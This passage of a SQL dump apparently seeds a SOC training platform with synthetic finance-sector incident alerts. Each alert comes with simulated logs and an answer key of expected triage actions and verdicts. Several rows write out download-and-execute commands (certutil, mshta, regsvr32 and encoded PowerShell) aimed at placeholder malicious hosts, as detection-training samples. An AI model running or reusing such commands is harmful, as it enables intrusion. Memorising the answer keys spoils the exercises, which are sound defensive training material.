payload\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Certutil was used to download a known malicious payload, indicating potential compromise via LOLBin techniques.\"}', 'Advanced', 'IR', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.951Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:30:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.20\\\",\\\"username\\\":\\\"malware_user\\\",\\\"hostname\\\":\\\"compromised-pc\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe C:\\\\\\\\temp\\\\\\\\payload.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.951Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:30:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.20\\\",\\\"username\\\":\\\"malware_user\\\",\\\"hostname\\\":\\\"compromised-pc\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe C:\\\\\\\\temp\\\\\\\\payload.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.951Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:30:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.20\\\",\\\"username\\\":\\\"malware_user\\\",\\\"hostname\\\":\\\"compromised-pc\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe C:\\\\\\\\temp\\\\\\\\payload.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.951Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:30:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.20\\\",\\\"username\\\":\\\"malware_user\\\",\\\"hostname\\\":\\\"compromised-pc\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f 
http://malicious.example.com/payload.exe C:\\\\\\\\temp\\\\\\\\payload.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.951Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:30:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.20\\\",\\\"username\\\":\\\"malware_user\\\",\\\"hostname\\\":\\\"compromised-pc\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe C:\\\\\\\\temp\\\\\\\\payload.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1411, 'Cozy Bear Phishing Campaign Detected', 'high', 'Proofpoint', 'A spear-phishing email with a malicious attachment was detected, resembling tactics used by Cozy Bear.', 'Phishing', 'T1566.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T11:12:48Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.50\",\"dst_ip\":\"10.0.1.100\",\"username\":\"jane.smith\",\"hostname\":\"email-server\",\"email_sender\":\"cozybear@example.com\",\"domain\":\"example.com\",\"attachment_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\"}', '2026-03-02 03:13:33', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"cozybear@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Email address linked to known phishing activities\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious attachment\"}}],\"expected_actions\":[\"block_hash\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a malicious attachment and sender details consistent with Cozy Bear phishing tactics. 
Immediate action is required to prevent compromise. Caveat: the recorded attachment_hash (e3b0c442...b855) is the SHA-256 of zero-length input, so it identifies an empty file rather than a specific malicious attachment; re-hash the quarantined attachment before acting on a hash-based block, and pivot on the sender address and source IP in the meantime.\"}', 'Advanced', 'IR', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Cozy Bear Phishing Campaign Detected\",\"date\":\"2026-03-02T13:55:06.952Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1412, 'APT29 Zero-Day Exploit Detected in SWIFT Environment', 'critical', 'Splunk', 'Anomalies indicating a zero-day exploit were detected in the SWIFT transaction servers, likely linked to APT29.', 'Zero-Day', 'T1214', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T08:05:37Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.3.45\",\"dst_ip\":\"192.168.3.10\",\"username\":\"swift_operator\",\"hostname\":\"swift-server01\",\"domain\":\"finance.local\"}', '2026-03-02 03:13:33', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP potentially compromised via zero-day exploit\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"finance.local\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Systems\",\"verdict\":\"internal\",\"details\":\"Internal domain for SWIFT operations\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"zero_day_exploit\",\"analysis_notes\":\"The network activity suggests exploitation using a zero-day vulnerability, consistent with APT29 tactics. 
Immediate containment is necessary.\"}', 'Advanced', 'IR', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.953Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:05:37Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.45\\\",\\\"dst_ip\\\":\\\"192.168.3.10\\\",\\\"username\\\":\\\"swift_operator\\\",\\\"hostname\\\":\\\"swift-server01\\\",\\\"domain\\\":\\\"finance.local\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.953Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:05:37Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.45\\\",\\\"dst_ip\\\":\\\"192.168.3.10\\\",\\\"username\\\":\\\"swift_operator\\\",\\\"hostname\\\":\\\"swift-server01\\\",\\\"domain\\\":\\\"finance.local\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.953Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:05:37Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.45\\\",\\\"dst_ip\\\":\\\"192.168.3.10\\\",\\\"username\\\":\\\"swift_operator\\\",\\\"hostname\\\":\\\"swift-server01\\\",\\\"domain\\\":\\\"finance.local\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.953Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:05:37Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.45\\\",\\\"dst_ip\\\":\\\"192.168.3.10\\\",\\\"username\\\":\\\"swift_operator\\\",\\\"hostname\\\":\\\"swift-server01\\\",\\\"domain\\\":\\\"finance.local\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.953Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:05:37Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.45\\\",\\\"dst_ip\\\":\\\"192.168.3.10\\\",\\\"username\\\":\\\"swift_operator\\\",\\\"hostname\\\":\\\"swift-server01\\\",\\\"domain\\\":\\\"finance.local\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1413, 'Data Exfiltration Using Legitimate Cloud Services', 'critical', 'CrowdStrike', 'Data exfiltration to a GitHub repository detected, using legitimate cloud services to evade detection.', 'Data Exfil', 'T1567', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T06:55:18Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.4.75\",\"dst_ip\":\"140.82.113.3\",\"username\":\"data_analyst\",\"hostname\":\"data-server\",\"domain\":\"github.com\"}', '2026-03-02 03:13:33', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.4.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP transmitting data externally\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"github.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"GitHub used for data exfiltration in past cases\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Using GitHub for data exfiltration is a tactic to fly under the radar by leveraging legitimate services. 
Immediate investigation is required. Because github.com is a legitimate service that the rest of the organization likely depends on, scope the block_ip action to the affected host (an egress or proxy rule for 192.168.4.75) rather than a network-wide block of 140.82.113.3, and record the destination repository, account and uploaded content before the host is isolated so the forensics step can establish what actually left the network.\"}', 'Advanced', 'IR', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1414, 'APT28 Supply Chain Attack Detected', 'critical', 'Wazuh', 'Indicators of a supply chain attack were found, potentially impacting financial software updates.', 'Supply Chain', 'T1195', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T07:42:27Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.5.55\",\"username\":\"software_update\",\"hostname\":\"update-server\",\"command_line\":\"mshta.exe http://malicious-updates.com/update.hta\"}', '2026-03-02 03:13:33', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal server executing malicious update script\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-updates.com/update.hta\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosting malicious HTA file used in supply chain attacks\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"mshta.exe http://malicious-updates.com/update.hta\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"mshta used to execute malicious HTML application\"}}],\"expected_actions\":[\"block_url\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"supply_chain\",\"analysis_notes\":\"The use of mshta to execute a malicious script from a known bad URL indicates a supply chain attack, likely impacting software integrity.\"}', 'Advanced', 'IR', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.957Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. 
Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T07:42:27Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.55\\\",\\\"username\\\":\\\"software_update\\\",\\\"hostname\\\":\\\"update-server\\\",\\\"command_line\\\":\\\"mshta.exe http://malicious-updates.com/update.hta\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.957Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T07:42:27Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.55\\\",\\\"username\\\":\\\"software_update\\\",\\\"hostname\\\":\\\"update-server\\\",\\\"command_line\\\":\\\"mshta.exe http://malicious-updates.com/update.hta\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.957Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T07:42:27Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.55\\\",\\\"username\\\":\\\"software_update\\\",\\\"hostname\\\":\\\"update-server\\\",\\\"command_line\\\":\\\"mshta.exe http://malicious-updates.com/update.hta\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.957Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T07:42:27Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.55\\\",\\\"username\\\":\\\"software_update\\\",\\\"hostname\\\":\\\"update-server\\\",\\\"command_line\\\":\\\"mshta.exe http://malicious-updates.com/update.hta\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.957Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T07:42:27Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.55\\\",\\\"username\\\":\\\"software_update\\\",\\\"hostname\\\":\\\"update-server\\\",\\\"command_line\\\":\\\"mshta.exe http://malicious-updates.com/update.hta\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1415, 'Lazarus Group Trading Fraud Detected', 'critical', 'Firewall', 'Anomalous trading activities detected, consistent with known Lazarus Group financial fraud operations.', 'Trading Fraud', 'T1210', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T10:25:14Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.6.30\",\"dst_ip\":\"172.16.0.10\",\"username\":\"trader.bob\",\"hostname\":\"trade-station01\",\"domain\":\"stock.exchange.local\"}', '2026-03-02 03:13:33', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.6.30\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in suspicious trading activities\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"stock.exchange.local\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Systems\",\"verdict\":\"internal\",\"details\":\"Internal domain for trading operations\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"fraud\",\"analysis_notes\":\"The detected anomalies match patterns of Lazarus Group\'s known financial fraud activities. Note that the raw log alone records a single internal connection from trader.bob on 192.168.6.30 to 172.16.0.10, which does not by itself evidence fraud: corroborate with trading-platform application logs (order volume, timing and counterparties against the user baseline) before attributing, and since 192.168.6.30 is an internal trading workstation, isolate that host and disable the trader.bob account rather than relying on a bare block_ip. Immediate investigation and containment required.\"}', 'Advanced', 'IR', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1416, 'APT41 Spear-Phishing Attack with Encoded PowerShell Command', 'critical', 'Proofpoint', 'A spear-phishing email targeting the HR department was detected. The email contained a macro-enabled Excel document with an encoded PowerShell command leading to a C2 domain.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T10:15:30Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.1.2.45\",\"username\":\"j.doe@financecorp.com\",\"hostname\":\"HR-Desktop-07\",\"email_sender\":\"hr-support@external.com\",\"command_line\":\"powershell.exe -enc W3Bhc3N3b3JkID0gJ1Bhc3N3b3JkMTIzJyA7IFtzeXN0ZW0uTmV0LlNlcnZpY2VzLkRucENsaWVudF0uR2V0SG9zdEJ5TmFtZSgnY21kLmRvbWFpbi5jb20nKS5BZGRyZXNz\"}', '2026-03-02 03:14:56', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 112 times for phishing activities\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"hr-support@external.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Domain associated with previous phishing campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -enc W3Bhc3N3b3JkID0gJ1Bhc3N3b3JkMTIzJyA7IFtzeXN0ZW0uTmV0LlNlcnZpY2VzLkRucENsaWVudF0uR2V0SG9zdEJ5TmFtZSgnY21kLmRvbWFpbi5jb20nKS5BZGRyZXNz\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded command leading to potential C2 communication\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email was identified as a spear-phishing attempt due to the encoded PowerShell command targeting internal HR systems.\"}', 'Advanced', 'MAL', 7, 1, 'FINANCE', NULL, 
NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"APT41 Spear-Phishing Attack with Encoded PowerShell Command\",\"date\":\"2026-03-02T13:55:06.962Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1417, 'Lazarus Group Lateral Movement via LOLBins', 'high', 'Wazuh', 'Detected usage of regsvr32 for executing a malicious script internally, indicating lateral movement attempts by Lazarus Group.', 'Lateral Movement', 'T1218', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T08:45:21Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.1.3.25\",\"dst_ip\":\"10.1.3.30\",\"username\":\"service.admin\",\"hostname\":\"Finance-Server-03\",\"command_line\":\"regsvr32 /s /n /u /i:http://malicious-site.com/script.sct scrobj.dll\"}', '2026-03-02 03:14:56', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.3.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the source machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.3.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the destination machine\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"regsvr32 /s /n /u /i:http://malicious-site.com/script.sct scrobj.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Command associated with malicious activity for lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Usage of regsvr32 to execute scripts is a known technique for lateral movement, matching patterns used by Lazarus Group.\"}', 'Advanced', 'MAL', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.963Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. 
Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:45:21Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.1.3.25\\\",\\\"dst_ip\\\":\\\"10.1.3.30\\\",\\\"username\\\":\\\"service.admin\\\",\\\"hostname\\\":\\\"Finance-Server-03\\\",\\\"command_line\\\":\\\"regsvr32 /s /n /u /i:http://malicious-site.com/script.sct scrobj.dll\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.963Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:45:21Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.1.3.25\\\",\\\"dst_ip\\\":\\\"10.1.3.30\\\",\\\"username\\\":\\\"service.admin\\\",\\\"hostname\\\":\\\"Finance-Server-03\\\",\\\"command_line\\\":\\\"regsvr32 /s /n /u /i:http://malicious-site.com/script.sct scrobj.dll\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.963Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:45:21Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.1.3.25\\\",\\\"dst_ip\\\":\\\"10.1.3.30\\\",\\\"username\\\":\\\"service.admin\\\",\\\"hostname\\\":\\\"Finance-Server-03\\\",\\\"command_line\\\":\\\"regsvr32 /s /n /u /i:http://malicious-site.com/script.sct scrobj.dll\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.963Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:45:21Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.1.3.25\\\",\\\"dst_ip\\\":\\\"10.1.3.30\\\",\\\"username\\\":\\\"service.admin\\\",\\\"hostname\\\":\\\"Finance-Server-03\\\",\\\"command_line\\\":\\\"regsvr32 /s /n /u /i:http://malicious-site.com/script.sct scrobj.dll\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.963Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:45:21Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.1.3.25\\\",\\\"dst_ip\\\":\\\"10.1.3.30\\\",\\\"username\\\":\\\"service.admin\\\",\\\"hostname\\\":\\\"Finance-Server-03\\\",\\\"command_line\\\":\\\"regsvr32 /s /n /u /i:http://malicious-site.com/script.sct scrobj.dll\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
